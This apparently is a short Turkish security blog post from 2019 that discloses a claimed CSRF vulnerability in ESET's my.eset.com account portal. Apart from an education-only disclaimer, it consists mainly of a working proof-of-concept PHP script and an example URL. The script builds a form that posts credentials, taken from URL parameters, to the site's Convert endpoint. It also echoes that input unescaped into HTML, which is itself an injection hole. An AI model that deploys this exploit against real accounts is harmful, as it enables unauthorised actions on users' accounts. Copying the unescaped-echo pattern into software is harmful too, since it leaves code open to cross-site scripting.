|

ESET CSRF Zaafiyeti



Ali Can Gönüllü tarafından 2019-12-09 20:31:26 tarihinde yazıldı. Tahmini okunma süresi 30 saniye.



Çalışmalarım için bağış yapmak isterseniz Patreon hesabımdan bağışta bulunabilirsiniz.

Blog adresinde yazılanlar sadece eğitim amacıyla deneysel olarak hazırlanmıştır. Konu içerisinde geçen yöntemleri kendi oluşturduğunuz test ortamında denemenizi tavsiye ederiz.
Herhangi bir tarih, yer ve/veya mekanda oluşacak zararlardan alicangonullu.org, alicangonullu.org yöneticisi ve/veya konu yazarı mesul değildir.

Exploit Date : 19.10.2019
Exploit Author : Ali Can Gönüllü
Exploit Site : my.eset.com
Poodle Of Cream:
<?php 
$user = $_GET["user"]; 
$pass = $_GET["pass"]; 
echo ' <form id="myForm" name="myForm" action="https://my.eset.com/Convert" method="post"> 
<input type="text" name="UserName" placeholder="UserName (EAV)" value="'.$user.'"><br> 
<input type="password" name="Password" placeholder="Password" value="'.$pass.'"><br> 
<input type="submit" value="Submit"> 
</form>'; 
?> 

Ex. xxx.php?user=xxx@xxx.net&pass=xxx